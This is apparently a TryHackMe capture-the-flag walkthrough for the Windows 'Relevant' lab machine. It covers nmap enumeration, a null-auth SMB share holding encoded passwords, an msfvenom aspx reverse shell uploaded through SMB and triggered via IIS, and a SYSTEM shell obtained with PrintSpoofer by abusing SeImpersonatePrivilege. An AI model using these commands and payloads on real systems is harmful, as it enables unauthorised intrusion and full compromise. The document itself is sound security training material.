#tryhackme #windows #medium
![[Pasted image 20250710233019.png]]
---
# Information Gathering - Nmap
TCP scan against all ports reveals 8 open ports.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ sudo nmap -sS $IP -Pn --open --min-rate 3000 -p-
[sudo] password for parallels:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-10 20:51 CDT
Nmap scan report for 10.10.124.72
Host is up (0.12s latency).
Not shown: 65527 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49663/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 43.95 seconds
```
TCP scan against open ports found with `-sCV` options to get more detailed information
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sCV $IP -p 80,135,139,445,3389,49663,49666,49667
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-10 20:54 CDT
Nmap scan report for 10.10.124.72
Host is up (0.13s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2025-07-10T01:49:40
|_Not valid after: 2026-01-09T01:49:40
| rdp-ntlm-info:
| Target_Name: RELEVANT
| NetBIOS_Domain_Name: RELEVANT
| NetBIOS_Computer_Name: RELEVANT
| DNS_Domain_Name: Relevant
| DNS_Computer_Name: Relevant
| Product_Version: 10.0.14393
|_ System_Time: 2025-07-11T01:55:28+00:00
|_ssl-date: 2025-07-11T01:56:07+00:00; -1s from scanner time.
49663/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h24m00s, deviation: 3h07m51s, median: 0s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
| Computer name: Relevant
| NetBIOS computer name: RELEVANT\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-07-10T18:55:31-07:00
| smb2-time:
| date: 2025-07-11T01:55:29
|_ start_date: 2025-07-11T01:49:40
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.10 seconds
```
UDP scan against top 10 ports.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sU $IP --top-ports 10
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-10 20:57 CDT
Nmap scan report for 10.10.124.72
Host is up (0.12s latency).
PORT STATE SERVICE
53/udp open|filtered domain
67/udp open|filtered dhcps
123/udp open|filtered ntp
135/udp open|filtered msrpc
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
161/udp open|filtered snmp
445/udp open|filtered microsoft-ds
631/udp open|filtered ipp
1434/udp open|filtered ms-sql-m
Nmap done: 1 IP address (1 host up) scanned in 2.64 seconds
```
---
# Footprinting
##### Port 445 - SMB
I tried listing shares with `smbclient` against the IP address and it acutally revealed 4 available shares. The share `nt4wrksv` stood out to me because the rest of the shares are default ones.
```bash
root@ip-10-10-151-101:~# smbclient -N -L $IP
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
nt4wrksv Disk
SMB1 disabled -- no workgroup available
```
The share `nt4wrksv` allowed `null authentication` meaning we are authenticated to the share without passwords. In the share, there was only one file named `passwords.txt`
```bash
root@ip-10-10-151-101:~# smbclient //$IP/nt4wrksv
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jul 25 22:46:04 2020
.. D 0 Sat Jul 25 22:46:04 2020
passwords.txt A 98 Sat Jul 25 16:15:33 2020
7735807 blocks of size 4096. 4950767 blocks available
smb: \>
```
Inside the file, the first line read `User Passwords - Encoded` and the other two lines appeared to be Base64-encoded. After decoding them, I found two sets of credentials. I tried to connect to RDP with the found credentials but failed.
![[Pasted image 20250710213753.png]]
`Nmap` script reveals the SMB service on port 445 has a known vulnerability `CVE-2017-0143`
```bash
root@ip-10-10-151-101:~# nmap --script vuln $IP -p 139,445
Starting Nmap 7.80 ( https://nmap.org ) at 2025-07-11 04:24 BST
Nmap scan report for ip-10-10-218-16.eu-west-1.compute.internal (10.10.218.16)
Host is up (0.00012s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
MAC Address: 02:44:41:DC:80:7B (Unknown)
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Nmap done: 1 IP address (1 host up) scanned in 15.82 seconds
```
##### Port 80
The landing page of the service on Port 80 is just a Microsoft IIS default page.
![[Pasted image 20250710213908.png]]
`gobuster` found several directories but all of them were inaccessible.
```bash
root@ip-10-10-151-101:~# gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.218.16
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/*checkout* (Status: 400) [Size: 3420]
/*docroot* (Status: 400) [Size: 3420]
/* (Status: 400) [Size: 3420]
/http%3A%2F%2Fwww (Status: 400) [Size: 3420]
/q%26a (Status: 400) [Size: 3420]
/http%3A (Status: 400) [Size: 3420]
/**http%3a (Status: 400) [Size: 3420]
/*http%3A (Status: 400) [Size: 3420]
/**http%3A (Status: 400) [Size: 3420]
/http%3A%2F%2Fyoutube (Status: 400) [Size: 3420]
/http%3A%2F%2Fblogs (Status: 400) [Size: 3420]
/http%3A%2F%2Fblog (Status: 400) [Size: 3420]
/**http%3A%2F%2Fwww (Status: 400) [Size: 3420]
Progress: 87664 / 87665 (100.00%)
===============================================================
Finished
===============================================================
```
# Exploit - Initial Access
##### Port 49663
`Gobuster` revealed the same directories as on port 80. I looked everywhere but couldn't find any leads to move forward from here. Then I thought to navigate to the share we found in the SMB server and it actually worked! It turns out all of `nt4wrksv` contents are directly accessible through HTTP on port 49663.
![[Pasted image 20250710223955.png]]
I'm going to upload a reverse shell payload to the SMB share `nt4wrksv` and take advantage of the fact that it's accessible via a web browser to trigger the shell.
I'm using `msfvenom` to create the reverse shell payload, and the payload type will be `.aspx` since the web server is running `IIS` which supports`.aspx` files by default.
```bash
root@ip-10-10-151-101:~# msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.151.101 LPORT=1234 -f aspx -o revshell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of aspx file: 3414 bytes
Saved as: revshell.aspx
```
```bash
root@ip-10-10-151-101:~# smbclient //$IP/nt4wrksv
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> put revshell.aspx
putting file revshell.aspx as \revshell.aspx (1666.9 kb/s) (average 1667.0 kb/s)
smb: \> ls
. D 0 Fri Jul 11 04:53:47 2025
.. D 0 Fri Jul 11 04:53:47 2025
passwords.txt A 98 Sat Jul 25 16:15:33 2020
revshell.aspx A 3414 Fri Jul 11 04:53:47 2025
7735807 blocks of size 4096. 5138963 blocks available
smb: \>
```
![[Pasted image 20250710225453.png]]
```powershell
root@ip-10-10-151-101:~# nc -lvnp 1234
Listening on 0.0.0.0 1234
Connection received on 10.10.218.16 49898
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool
c:\windows\system32\inetsrv>
```
In `C:\Users\Bob\Desktop`, I found `user.txt`
![[Pasted image 20250710225601.png]]
# Privilege Escalation
I was doing some enumeration to look for any clues for privilege escalation. Then `whoami /priv` command revealed that the user `Bob` has `SeImpersonatePrivilege` enabled.
![[Pasted image 20250710231321.png]]
We are going to use `PrintSpoofer64.exe` binary to exploit this vulnerability. In order to do so, we need to first download the binary in our Kali and transfer the file over to the remote Windows system.
`wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe`
![[Pasted image 20250710232252.png]]
![[Pasted image 20250710232641.png]]
`PrintSpoofer64.exe -i -c powershell` command instantly creates an interactive powershell session as `SYSTEM`.
![[Pasted image 20250710232746.png]]
Found `root.txt`
![[Pasted image 20250710232946.png]]